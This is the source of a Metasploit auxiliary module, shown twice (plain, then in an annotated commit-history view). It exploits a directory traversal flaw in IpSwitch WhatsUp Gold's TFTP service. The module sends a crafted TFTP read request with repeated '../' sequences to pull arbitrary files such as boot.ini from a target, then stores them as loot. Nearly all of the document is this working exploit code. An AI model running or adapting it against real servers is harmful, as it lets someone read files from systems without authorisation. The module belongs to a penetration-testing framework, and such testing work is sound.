metasploit-framework/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Auxiliary::Scanner
	include Msf::Auxiliary::Report

	def initialize(info={})
		super(update_info(info,
			'Name'           => "IpSwitch WhatsUp Gold TFTP Directory Traversal",
			'Description'    => %q{
					This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp
				Gold's TFTP service.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Prabhu S Angadi',  #Initial discovery and poc
					'sinn3r'            #Metasploit
				],
			'References'     =>
				[
					['OSVDB', '77455'],
					['URL', 'http://www.exploit-db.com/exploits/18189/'],
					['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
				],
			'DisclosureDate' => "Dec 12 2011"
		))

		register_options(
			[
				Opt::RPORT(69),
				OptString.new('FILENAME', [false, 'The file to loot', 'boot.ini']),
				OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])
			], self.class)
	end

	def run_host(ip)
		# Prepare the filename
		file_name  = "../"*10
		file_name << datastore['FILENAME']

		# Prepare the packet
		pkt = "\x00\x01"
		pkt << file_name
		pkt << "\x00"
		pkt << "octet"
		pkt << "\x00"

		# We need to reuse the same port in order to receive the data
		udp_sock = Rex::Socket::Udp.create(
			{
				'Context' => {'Msf' => framework, 'MsfExploit'=>self}
			}
		)

		add_socket(udp_sock)

		# Send the packet to target
		udp_sock.sendto(pkt, ip, datastore['RPORT'])

		res = udp_sock.get(65535)
		res = res[4, res.length]
		udp_sock.close

		# Output file if verbose
		vprint_line(res.to_s)

		# Save file to disk
		path = store_loot(
			'whatsupgold.tftp',
			'application/octet-stream',
			ip,
			res,
			datastore['FILENAME']
		)

		print_status("File saved in: #{path}")
	end
end

=begin
Remote code execution might be unlikely with this directory traversal bug, because WRITE
requests are forbidden by default, and cannot be changed.
=end
Add IPSwitch Whatsup Gold TFTP directory traversal module 2011-12-04 00:46:34 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "IpSwitch WhatsUp Gold TFTP Directory Traversal",`
			`'Description' => %q{`
			`This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp`
			`Gold's TFTP service.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Prabhu S Angadi', #Initial discovery and poc`
			`'sinn3r' #Metasploit`
			`],`
			`'References' =>`
			`[`
add osvdb ref 2011-12-04 13:48:48 +00:00			`['OSVDB', '77455'],`
Add IPSwitch Whatsup Gold TFTP directory traversal module 2011-12-04 00:46:34 +00:00			`['URL', 'http://www.exploit-db.com/exploits/18189/'],`
			`['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']`
			`],`
			`'DisclosureDate' => "Dec 12 2011"`
			`))`

			`register_options(`
			`[`
			`Opt::RPORT(69),`
			`OptString.new('FILENAME', [false, 'The file to loot', 'boot.ini']),`
			`OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])`
			`], self.class)`
			`end`

			`def run_host(ip)`
			`# Prepare the filename`
			`file_name = "../"*10`
			`file_name << datastore['FILENAME']`

			`# Prepare the packet`
			`pkt = "\x00\x01"`
			`pkt << file_name`
			`pkt << "\x00"`
			`pkt << "octet"`
			`pkt << "\x00"`

			`# We need to reuse the same port in order to receive the data`
			`udp_sock = Rex::Socket::Udp.create(`
			`{`
			`'Context' => {'Msf' => framework, 'MsfExploit'=>self}`
			`}`
			`)`

			`add_socket(udp_sock)`

			`# Send the packet to target`
			`udp_sock.sendto(pkt, ip, datastore['RPORT'])`

			`res = udp_sock.get(65535)`
			`res = res[4, res.length]`
			`udp_sock.close`

			`# Output file if verbose`
			`vprint_line(res.to_s)`

			`# Save file to disk`
			`path = store_loot(`
			`'whatsupgold.tftp',`
			`'application/octet-stream',`
			`ip,`
			`res,`
			`datastore['FILENAME']`
			`)`

			`print_status("File saved in: #{path}")`
			`end`
			`end`

			`=begin`
			`Remote code execution might be unlikely with this directory traversal bug, because WRITE`
			`requests are forbidden by default, and cannot be changed.`
add osvdb ref 2011-12-04 13:48:48 +00:00			`=end`